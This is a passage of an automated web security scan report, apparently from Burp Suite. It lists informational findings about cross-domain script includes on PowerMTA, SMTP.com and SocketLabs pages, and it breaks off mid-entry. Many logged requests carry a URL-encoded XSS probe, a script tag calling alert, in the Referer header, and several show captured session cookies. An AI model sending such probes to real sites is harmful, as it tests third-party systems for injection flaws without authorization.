HTTP/1.1 200 OK.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.65. http://www.powermta.port25.com/download-a-white-paper/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/download-a-white-paper/
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /download-a-white-paper/ HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.38440b2cc83a3d5c03dcf8c; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.1.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A1%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A1%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A1
Response
HTTP/1.1 200 OK.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/x...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.66. http://www.powermta.port25.com/smtp-server-software-2/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/smtp-server-software-2/
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.67. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/about-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.68. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/face-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.69. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/headerimg.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.70. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/in-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.71. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/phone-number.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.72. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/powerMTA-footer-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.73. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/powerMTA-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.74. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/submit_btn.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.75. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/tag-line.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.76. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/images/twit-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.77. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.78. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/js/jquery-1.2.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.79. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.80. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.81. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/scripts/rsv.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.82. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/style.css
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET /wp-content/themes/powermta1/style.css HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .com/wp-content/plugins/cforms/styling/sidebar-layout.css" /><script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
16.83. http://www.smtp.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.smtp.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
Request
GET /?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKadd3a4b2c60da"=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... /main.css?1268498319" media="screen" rel="stylesheet" type="text/css" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]...
16.84. http://www.smtp.com/service-info
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.smtp.com
Path:
/service-info
Issue detail
The response dynamically includes the following script from another domain:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
Request
GET /service-info HTTP/1.1?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.1.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _global_session=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd
Response
HTTP/1.1 200 OK91864e2e39b58"=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... /main.css?1268498319" media="screen" rel="stylesheet" type="text/css" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]...
16.85. https://www.smtp.com/signup
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.smtp.com
Path:
/signup
Issue detail
The response dynamically includes the following script from another domain:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
Request
GET /signup HTTP/1.1/service-info/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK5fb6813a39fd7"=BAh7CDoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOhBfY3NyZl90b2tlbiIxcVNXak9kck5TK2dKaGYwUEtoUjQ4UGpNTGozeC9RejlGUjM0a0xZTEpzND06D3Nlc3Npb25faWQiJTgyMzI5Y2M4NmE0M2FjMGE5MzQ1MzQ0NzM4ZGJmNWU1--9d864407dc9132ffb7b5e9c9928c23d380537ed3; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... /main.css?1268498319" media="screen" rel="stylesheet" type="text/css" /><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]...
16.86. http://www.socketlabs.com/lpages/od-smtp-service
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.socketlabs.com
Path:
/lpages/od-smtp-service
Issue detail
The response dynamically includes the following script from another domain:http://static.woopra.com/js/woopra.v2.js
Request
